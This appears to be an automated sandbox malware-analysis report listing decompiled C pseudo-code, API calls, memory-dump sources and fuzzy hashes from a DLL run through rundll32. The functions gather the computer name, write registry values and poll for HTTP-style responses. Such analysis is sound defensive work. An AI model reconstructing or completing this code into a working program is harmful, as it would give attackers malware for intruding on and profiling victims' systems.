                                      				void* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				intOrPtr* _t22;
                                      				void* _t23;
                                      				intOrPtr* _t24;
                                      				intOrPtr* _t26;
                                      				intOrPtr* _t28;
                                      				intOrPtr* _t30;
                                      				void* _t31;
                                      				intOrPtr* _t32;
                                      				intOrPtr _t42;
                                      				intOrPtr _t45;
                                      				intOrPtr _t48;
                                      				void* _t51;
                                      
                                      				_push( &_v16);
                                      				_t42 =  *0x4dea348; // 0x6bd5a8
                                      				_t2 = _t42 + 0x4deb470; // 0x20400
                                      				_push(0);
                                      				_push(__eax);
                                      				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                      				if(_t51 >= 0) {
                                      					_t22 = _v16;
                                      					_t45 =  *0x4dea348; // 0x6bd5a8
                                      					_t6 = _t45 + 0x4deb490; // 0xe7a1af80
                                      					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                      					_t51 = _t23;
                                      					if(_t51 >= 0) {
                                      						_t26 = _v12;
                                      						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                      						if(_t51 >= 0) {
                                      							_t48 =  *0x4dea348; // 0x6bd5a8
                                      							_t30 = _v8;
                                      							_t12 = _t48 + 0x4deb480; // 0xa4c6892c
                                      							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                      							_t51 = _t31;
                                      							_t32 = _v8;
                                      							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                      						}
                                      						_t28 = _v12;
                                      						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                      					}
                                      					_t24 = _v16;
                                      					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                      				}
                                      				return _t51;
                                      			}


                                      APIs
                                      • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04DE6652
                                      • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04DE6683
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Interface_ProxyQueryUnknown_
                                      • String ID:
                                      • API String ID: 2522245112-0
                                      • Opcode ID: cc814e2dd1b44ab974f7401b8de54b2f5a04eb3acc7168d44ec863da205b22f8
                                      • Instruction ID: d89b2be2c9a27e678291d81367c80345725cc8e98e3f672b47766f616db84cd7
                                      • Opcode Fuzzy Hash: cc814e2dd1b44ab974f7401b8de54b2f5a04eb3acc7168d44ec863da205b22f8
                                      • Instruction Fuzzy Hash: 8D210D75A0061AEFCB00DBA5C498D5AB779FFC8714B148688E905DB314D631FD41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04DE290B
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SafeArrayDestroy.OLEAUT32(?), ref: 04DE295B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ArraySafe$CreateDestroyFreeString
                                      • String ID:
                                      • API String ID: 3098518882-0
                                      • Opcode ID: 084a7c9d2588f21770a13273b46e4e796069e8d1cf49937702ff68be4b856c30
                                      • Instruction ID: 351454fdfbe031b09fd504b2f28bc227197a1f50ea497a6d78891925c14e1fa0
                                      • Opcode Fuzzy Hash: 084a7c9d2588f21770a13273b46e4e796069e8d1cf49937702ff68be4b856c30
                                      • Instruction Fuzzy Hash: 42113071A0010ABFDB01EFA5DC04AEEB7B9EF04750F408055FA04A7260E675EA158B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE13F8(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                      				struct _FILETIME _v12;
                                      				signed int _t11;
                                      				void* _t16;
                                      				short _t19;
                                      				void* _t22;
                                      				void* _t24;
                                      				void* _t25;
                                      				short* _t26;
                                      
                                      				_t24 = __edx;
                                      				_t25 = E04DE4208(_t11, _a12);
                                      				if(_t25 == 0) {
                                      					_t22 = 8;
                                      				} else {
                                      					_t26 = _t25 + _a16 * 2;
                                      					 *_t26 = 0; // executed
                                      					_t16 = E04DE56AD(__ecx, _a4, _a8, _t25); // executed
                                      					_t22 = _t16;
                                      					if(_t22 == 0) {
                                      						GetSystemTimeAsFileTime( &_v12);
                                      						_t19 = 0x5f;
                                      						 *_t26 = _t19;
                                      						_t22 = E04DE4C88(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                      					}
                                      					HeapFree( *0x4dea2d8, 0, _t25);
                                      				}
                                      				return _t22;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                      • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,77005520,00000008,00000014,004F0053,054A93CC), ref: 04DE1430
                                      • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,77005520,00000008,00000014,004F0053,054A93CC), ref: 04DE145E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                      • String ID:
                                      • API String ID: 1500278894-0
                                      • Opcode ID: ca900eea07c23a2d4b0ac8d6d38a2a12454932949bf338993b9e4f5457f24406
                                      • Instruction ID: d4fea0b3f46040ba051408ade80553044b2d44514c3af5857b8919c288ad4a75
                                      • Opcode Fuzzy Hash: ca900eea07c23a2d4b0ac8d6d38a2a12454932949bf338993b9e4f5457f24406
                                      • Instruction Fuzzy Hash: 40018471310209BBDB117F96DC44EAF3B78FF84714F404025FA009A251E671E954D760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(04DE744C), ref: 04DE7900
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE7941
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: 8566d3f9d1c70104e0bfab7d909ad3bbd01e1049a22fc14377e3011f48434407
                                      • Instruction ID: 7ae96a2dc8ed0c3079a8c41095c1b6ec5aac71d18b517e6f482a84ca5b1c564f
                                      • Opcode Fuzzy Hash: 8566d3f9d1c70104e0bfab7d909ad3bbd01e1049a22fc14377e3011f48434407
                                      • Instruction Fuzzy Hash: 2A01677560111ABFDF41EFAAD804DAF7BB8EF48710B014022FA08E7120E630ED15C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E04DE1567(void* __ecx) {
                                      				signed int _v8;
                                      				void* _t15;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t22;
                                      				intOrPtr* _t23;
                                      
                                      				_t23 = __imp__;
                                      				_t20 = 0;
                                      				_v8 = _v8 & 0;
                                      				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                      				_t10 = _v8;
                                      				if(_v8 != 0) {
                                      					_t20 = E04DE4DF6(_t10 + 1);
                                      					if(_t20 != 0) {
                                      						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                      						if(_t15 != 0) {
                                      							 *((char*)(_v8 + _t20)) = 0;
                                      						} else {
                                      							E04DE4C73(_t20);
                                      							_t20 = 0;
                                      						}
                                      					}
                                      				}
                                      				return _t20;
                                      			}

                                      APIs
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04DE641B), ref: 04DE157F
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04DE641B), ref: 04DE159C
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ComputerHeapName$AllocateFree
                                      • String ID:
                                      • API String ID: 187446995-0
                                      • Opcode ID: 77d4af4f1d42ac2e5117072611c991ed1e2c741ceaae39955249507e4d7a2ac7
                                      • Instruction ID: 30862371856d13b98ddd0fb84c098b60747390e18aa73700146bbb42f512bd0d
                                      • Opcode Fuzzy Hash: 77d4af4f1d42ac2e5117072611c991ed1e2c741ceaae39955249507e4d7a2ac7
                                      • Instruction Fuzzy Hash: 53F05466B00105BBEB11E6AB8D04EBF77FCDBC5654F110155A905E7141EA70EE029670
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE75C6(WCHAR* _a4) {
                                      				void* __edi;
                                      				intOrPtr _t11;
                                      				intOrPtr _t14;
                                      				void* _t16;
                                      				void* _t18;
                                      				WCHAR* _t20;
                                      
                                      				_t20 = E04DE4DF6(lstrlenW(_a4) + _t7 + 0x5c);
                                      				if(_t20 == 0) {
                                      					_t18 = 8;
                                      				} else {
                                      					_t11 =  *0x4dea348; // 0x6bd5a8
                                      					_t5 = _t11 + 0x4deba48; // 0x43002f
                                      					wsprintfW(_t20, _t5, 5, _a4);
                                      					_t14 =  *0x4dea348; // 0x6bd5a8
                                      					_t6 = _t14 + 0x4deb8f8; // 0x6d0063
                                      					_t16 = E04DE3E6C(0, _t6, _t20, 0); // executed
                                      					_t18 = _t16;
                                      					E04DE4C73(_t20);
                                      				}
                                      				return _t18;
                                      			}

                                      APIs
                                      • lstrlenW.KERNEL32(7705F710,00000000,?,04DE2AC0,00000000,?,7705F710,00000000,7705F730), ref: 04DE75CC
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • wsprintfW.USER32 ref: 04DE75F5
                                        • Part of subcall function 04DE3E6C: memset.NTDLL ref: 04DE3E8F
                                        • Part of subcall function 04DE3E6C: GetLastError.KERNEL32 ref: 04DE3EDB
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                      • String ID:
                                      • API String ID: 1672627171-0
                                      • Opcode ID: af2a276224268af6b281964f3a0b57dcf0d76f180d457ebffbd9212f5bebb4d0
                                      • Instruction ID: bb87a6a9b4f83b8101a877ced2e10a4e8473ffb110c778e1cdc335e2269a6d95
                                      • Opcode Fuzzy Hash: af2a276224268af6b281964f3a0b57dcf0d76f180d457ebffbd9212f5bebb4d0
                                      • Instruction Fuzzy Hash: 32F0B432201615ABD751F75BEC48EAB379CDF84714F028412F504CB311D634F8518775
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE3D23(signed int __edx, intOrPtr _a4) {
                                      				void* _t3;
                                      				void* _t5;
                                      				void* _t7;
                                      				void* _t8;
                                      				void* _t9;
                                      				signed int _t10;
                                      
                                      				_t10 = __edx;
                                      				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                      				 *0x4dea2d8 = _t3;
                                      				if(_t3 == 0) {
                                      					_t8 = 8;
                                      					return _t8;
                                      				}
                                      				 *0x4dea1c8 = GetTickCount();
                                      				_t5 = E04DE515F(_a4);
                                      				if(_t5 == 0) {
                                      					_t5 = E04DE39B5(_t9, _a4); // executed
                                      					if(_t5 == 0) {
                                      						if(E04DE6729(_t9) != 0) {
                                      							 *0x4dea300 = 1; // executed
                                      						}
                                      						_t7 = E04DE2C52(_t10); // executed
                                      						return _t7;
                                      					}
                                      				}
                                      				return _t5;
                                      			}

                                      APIs
                                      • HeapCreate.KERNEL32(00000000,00400000,00000000,04DE3DA8,?), ref: 04DE3D2C
                                      • GetTickCount.KERNEL32 ref: 04DE3D40
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CountCreateHeapTick
                                      • String ID:
                                      • API String ID: 2177101570-0
                                      • Opcode ID: 1865871dec3c2546f742be4c332c06dea154e21bff7e08c9d47e5d16e8d04f09
                                      • Instruction ID: e14d0e123b5d29526b44585351e3a3ec04abffbb9f1107b9deab4b1624061559
                                      • Opcode Fuzzy Hash: 1865871dec3c2546f742be4c332c06dea154e21bff7e08c9d47e5d16e8d04f09
                                      • Instruction Fuzzy Hash: 41F012B0380702AAEB603FB3AD25B397AD4FF04748F504465ED46DA391EB75F8019635
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE5347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                      				intOrPtr _v12;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				signed int _v60;
                                      				char _v68;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr _t14;
                                      				signed int* _t16;
                                      				signed int _t25;
                                      				signed int _t26;
                                      				signed int* _t28;
                                      				signed int _t30;
                                      
                                      				_t28 = __ecx;
                                      				_t14 =  *0x4dea368; // 0x54a9618
                                      				_v12 = _t14;
                                      				_t16 = _a12;
                                      				_t30 = 8;
                                      				if(_t16 != 0) {
                                      					 *_t16 =  *_t16 & 0x00000000;
                                      				}
                                      				do {
                                      					_t31 =  &_v68;
                                      					if(E04DE24BC( &_v68) == 0) {
                                      						goto L16;
                                      					}
                                      					_t30 = E04DE4BD6(_t31, _a4, _v12);
                                      					if(_t30 == 0) {
                                      						_t25 = E04DE595A(_t31, 0x102, _t28, _t30); // executed
                                      						_t30 = _t25;
                                      						if(_t30 != 0) {
                                      							if(_t30 == 0x102) {
                                      								E04DEA000 = E04DEA000 + 0xea60;
                                      							}
                                      						} else {
                                      							if(_v24 != 0xc8) {
                                      								_t30 = 0xe8;
                                      							} else {
                                      								_t26 = _v20;
                                      								if(_t26 == 0) {
                                      									_t30 = 0x10d2;
                                      								} else {
                                      									_t28 = _a8;
                                      									if(_t28 != 0) {
                                      										_v60 = _v60 & _t30;
                                      										 *_t28 = _v60;
                                      										_t28 = _a12;
                                      										if(_t28 != 0) {
                                      											 *_t28 = _t26;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					E04DE15B9( &_v68, 0x102, _t28, _t30);
                                      					L16:
                                      				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4dea30c, 0) == 0x102);
                                      				return _t30;
                                      			}

                                      APIs
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,770481D0), ref: 04DE53F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID:
                                      • API String ID: 24740636-0
                                      • Opcode ID: 5aac7610aeec3b4c2539dcfd1cba6b06b7a1ad1994637e1db96f42d9bbddb2c4
                                      • Instruction ID: f0b56189d6c6a8b44fb1f1cb0dbe90dbe28f34ef70fc5b653470cf6f86b77c63
                                      • Opcode Fuzzy Hash: 5aac7610aeec3b4c2539dcfd1cba6b06b7a1ad1994637e1db96f42d9bbddb2c4
                                      • Instruction Fuzzy Hash: 9C216D32700306ABDF11FE97E8A0A7E77B5FB80399F944429E9029B240DBB4ED51C761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 34%
                                      			E04DE6D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                      				intOrPtr _v12;
                                      				void* _v18;
                                      				char _v20;
                                      				intOrPtr _t15;
                                      				void* _t17;
                                      				intOrPtr _t19;
                                      				void* _t23;
                                      
                                      				_v20 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				_t15 =  *0x4dea348; // 0x6bd5a8
                                      				_t4 = _t15 + 0x4deb39c; // 0x54a8944
                                      				_t20 = _t4;
                                      				_t6 = _t15 + 0x4deb124; // 0x650047
                                      				_t17 = E04DE69D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                      				if(_t17 < 0) {
                                      					_t23 = _t17;
                                      				} else {
                                      					_t23 = 8;
                                      					if(_v20 != _t23) {
                                      						_t23 = 1;
                                      					} else {
                                      						_t19 = E04DE1109(_t20, _v12);
                                      						if(_t19 != 0) {
                                      							 *_a16 = _t19;
                                      							_t23 = 0;
                                      						}
                                      						__imp__#6(_v12);
                                      					}
                                      				}
                                      				return _t23;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                        • Part of subcall function 04DE1109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04DE2B23,004F0053,00000000,?), ref: 04DE1112
                                        • Part of subcall function 04DE1109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04DE2B23,004F0053,00000000,?), ref: 04DE113C
                                        • Part of subcall function 04DE1109: memset.NTDLL ref: 04DE1150
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE6D68
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeString$lstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 397948122-0
                                      • Opcode ID: 7d142769954020193f00097b46ce8989fc651a83a067879f07b92f48e840d7bc
                                      • Instruction ID: acc1a228d769f253a22114b40b014dbaec5b9324f6e62aa3cc8ad206ba731d8a
                                      • Opcode Fuzzy Hash: 7d142769954020193f00097b46ce8989fc651a83a067879f07b92f48e840d7bc
                                      • Instruction Fuzzy Hash: 12015A7260052ABFDB11AFAACC04DBEBBB8FB04650F804425EA05A6161E771F912C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E04DE267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                      				char _v8;
                                      				void* _t14;
                                      				intOrPtr _t17;
                                      				void* _t20;
                                      				void* _t26;
                                      
                                      				_push(__ecx);
                                      				if(_a4 == 0 || __eax == 0) {
                                      					_t26 = 0x57;
                                      				} else {
                                      					_t14 = E04DE215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                      					_t26 = _t14;
                                      					if(_t26 == 0) {
                                      						_t17 =  *0x4dea348; // 0x6bd5a8
                                      						_t9 = _t17 + 0x4deba38; // 0x444f4340
                                      						_t20 = E04DE250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                      						_t26 = _t20;
                                      						RtlFreeHeap( *0x4dea2d8, 0, _a4); // executed
                                      					}
                                      				}
                                      				return _t26;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04DE2172
                                        • Part of subcall function 04DE250D: lstrlen.KERNEL32(7705F710,?,00000000,?,7705F710), ref: 04DE2541
                                        • Part of subcall function 04DE250D: StrStrA.SHLWAPI(00000000,?), ref: 04DE254E
                                        • Part of subcall function 04DE250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE256D
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04DE61F6), ref: 04DE26D5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Allocate$Freelstrlen
                                      • String ID:
                                      • API String ID: 2220322926-0
                                      • Opcode ID: 42003dabf37f2c63d012fe47abc13cb8b0ee7db8ac1c01aa28ed6402cc1f15f6
                                      • Instruction ID: a0b425e24e9c5933caeecf9ed6fd736833b96715cca2a326b4177b29cb2a6b3e
                                      • Opcode Fuzzy Hash: 42003dabf37f2c63d012fe47abc13cb8b0ee7db8ac1c01aa28ed6402cc1f15f6
                                      • Instruction Fuzzy Hash: AB016D76200109FFDB12EF46DC10EAA77ADEB44350F108169FA0996260E771FA85DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE4C73(void* _a4) {
                                      				char _t2;
                                      
                                      				_t2 = RtlFreeHeap( *0x4dea2d8, 0, _a4); // executed
                                      				return _t2;
                                      			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: fe5d8c962a8cf1f5e66aa84af77e12c62506f7c172d12d7d15ea25c58742d197
                                      • Instruction ID: 611a25e4a7d0e2373ca845f74e26d782417c70c42e0b021fcf509bc26a6b84e7
                                      • Opcode Fuzzy Hash: fe5d8c962a8cf1f5e66aa84af77e12c62506f7c172d12d7d15ea25c58742d197
                                      • Instruction Fuzzy Hash: DAB012B1301200ABCB116B03DE24F057B21E790700F004010B3041837582360C20FB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE17E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                      				void* _v8;
                                      				int _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v144;
                                      				int _v148;
                                      				intOrPtr _v152;
                                      				intOrPtr _v156;
                                      				intOrPtr _v160;
                                      				char _v164;
                                      				void* _t37;
                                      				void* _t42;
                                      				void* _t51;
                                      				int _t53;
                                      				void* _t60;
                                      				void* _t63;
                                      				void* _t64;
                                      
                                      				_t53 = 0;
                                      				_t60 = __ecx;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                      					L21:
                                      					return _t53;
                                      				} else {
                                      					_t58 =  &_v164;
                                      					_t37 = E04DE2F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                      					if(_t37 != 0) {
                                      						goto L21;
                                      					}
                                      					_t61 = _t60 - 0x80;
                                      					if(_v148 > _t60 - 0x80) {
                                      						goto L21;
                                      					}
                                      					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                      						_t37 = _t37 + 1;
                                      						if(_t37 < 0x10) {
                                      							continue;
                                      						}
                                      						_t53 = _v148;
                                      						_t51 = E04DE4DF6(_t53);
                                      						_v8 = _t51;
                                      						_t73 = _t51;
                                      						if(_t51 != 0) {
                                      							_t53 = 0;
                                      							L18:
                                      							if(_t53 != 0) {
